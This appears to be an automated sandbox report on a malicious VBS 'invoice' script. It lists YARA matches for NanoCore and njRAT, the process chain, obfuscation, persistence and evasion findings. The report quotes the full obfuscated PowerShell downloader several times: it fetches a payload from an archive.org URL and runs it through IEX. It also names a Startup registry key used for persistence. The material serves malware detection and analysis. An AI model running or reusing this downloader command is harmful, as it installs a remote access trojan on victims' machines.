      Source: 20.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 20.2.aspnet_compiler.exe.3b7f99e.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.3b7f99e.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.3814575.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.3814575.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.3b7156e.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.3b7156e.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.2849aac.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.2849aac.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.2849aac.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 20.2.aspnet_compiler.exe.286a330.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.286a330.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.286a330.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000001.00000002.652005586.000002534BC55000.00000004.00000040.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
      Source: 00000014.00000002.1178034772.0000000003B0C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000001.00000003.651067855.000002534BC5B000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
      Source: 00000014.00000002.1170915770.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000014.00000002.1170915770.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000016.00000002.1171008020.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
      Source: 00000001.00000002.652059892.000002534D420000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
      Source: 00000014.00000002.1173893063.000000000282D000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: aspnet_compiler.exe PID: 7072, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: aspnet_compiler.exe PID: 7072, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 20.2.aspnet_compiler.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 20.2.aspnet_compiler.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
      Source: 20.2.aspnet_compiler.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
      Source: 22.2.aspnet_compiler.exe.400000.0.unpack, L.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 22.2.aspnet_compiler.exe.400000.0.unpack, L.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: 20.2.aspnet_compiler.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 20.2.aspnet_compiler.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: classification engineClassification label: mal100.troj.evad.winVBS@12/11@16/3
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20210803Jump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6772:120:WilError_01
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{401b59fa-a7f2-4468-a03b-04e3bc489e18}
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMutant created: \Sessions\1\BaseNamedObjects\Windows
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dcg2nrvy.g5h.ps1Jump to behavior
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\3G1J49A6V_Invoice.vbs'
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\3G1J49A6V_Invoice.vbs'
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
      Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: aspnet_compiler.exe, 00000014.00000002.1173893063.000000000282D000.00000004.00000001.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbt_{& source: powershell.exe, 00000003.00000003.971380287.000001EA40435000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: aspnet_compiler.exe, 00000014.00000002.1178034772.0000000003B0C000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: aspnet_compiler.exe, 00000014.00000002.1173893063.000000000282D000.00000004.00000001.sdmp
      Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: aspnet_compiler.exe, 00000014.00000002.1173893063.000000000282D000.00000004.00000001.sdmp
      Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: aspnet_compiler.exe, 00000014.00000002.1178034772.0000000003B0C000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: aspnet_compiler.exe, 00000014.00000002.1178170237.0000000003C41000.00000004.00000001.sdmp

      Data Obfuscation:

      barindex
      VBScript performs obfuscated calls to suspicious functionsShow sources
      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWERsHELL $TRUMP ='https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt';$B ='ETH COINt.WTF CO", "0")
      .NET source code contains potential unpackerShow sources
      Source: 20.2.aspnet_compiler.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 20.2.aspnet_compiler.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 22.2.aspnet_compiler.exe.400000.0.unpack, L.cs.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Obfuscated command line foundShow sources
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');
      Source: 20.2.aspnet_compiler.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 20.2.aspnet_compiler.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

      Boot Survival:

      barindex
      Creates an undocumented autostart registry key Show sources
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe:Zone.Identifier read attributes | delete
      Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
